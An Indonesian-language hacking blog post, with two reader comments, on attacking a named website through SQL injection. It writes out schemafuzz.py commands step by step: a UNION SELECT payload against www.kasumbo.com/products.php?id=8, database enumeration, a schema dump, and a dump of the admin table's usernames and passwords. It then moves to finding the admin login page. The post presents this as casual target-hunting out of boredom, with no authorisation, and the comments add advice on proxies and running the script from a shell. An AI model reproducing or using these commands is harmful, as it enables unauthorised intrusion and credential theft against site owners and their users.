1:10 AM
secure your world
Bengang bengong di kosan daripada bete gg ada kerjaan gw iseng-iseng aja nyari target dengan menggunakan sqli.. kemudian dari pada repot dengan menggunakan sql injeksion saya pake schemafuzz aja biar simple gg bertele" hehehee
sebelum kita menggunakan schemafuzz pada windows terlebih utama kita menginstall perl serta python untuk memanggil schemafuzz,dll... krna scehmafuzz menggunakan python ....
bagi yg belum punya bisa di download di sini
setlah kita install maka cari target !!
target yg saya gunakan kali ini adalah www.kasumbo.com/products.php?id=8
schemafuzz.py --findcol -u www.kasumbo.com/products.php?id=8
setelah itu dengan secara otomatis akan mencari dmna bug dari situs si target...
nah sekarang dia sudah mencari dmna bug berada... langkah selanjutnya adalah kita mencari nama database target kita dengan mengetik:
schemafuzz.py --dbs -u www.kasumbo.com/products.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,4,5,6,7
catatan "darkc0de" itu nol(angka) ya bukan o(huruf)
nah setelah kita menemukan nama database tersebut kita cari column serta table dari databasenya yakni dengan mengtikan : schemafuzz.py --schema -u www.kasumbo.com/products.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,4,5,6,7 -D kasumbo
-D (nama databasenya loh) lalu hasilnya akan seperti ini:
schemafuzz.py --dump -u www.kasumbo.com/products.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,4,5,6,7 -D kasumbo -T admin -C user,pass
setelah itu kita cari deh halaman admin target kita dengan menggunakan admin.pl
tinggal kita masukin situs si target yg mau kita cari adminnya
2 komentar:
dod,,
klo pgn jalan2 kya gtu..
harus pake proxy gag?
pa lgs aja?
jalan" kaya gmna maksudnya bang ??
klo ada proxynya boleh juga tuh di pake...
tapi lebih baik klo scrytpnya di jalanin di shell...
jadi lebih cepet
Post a Comment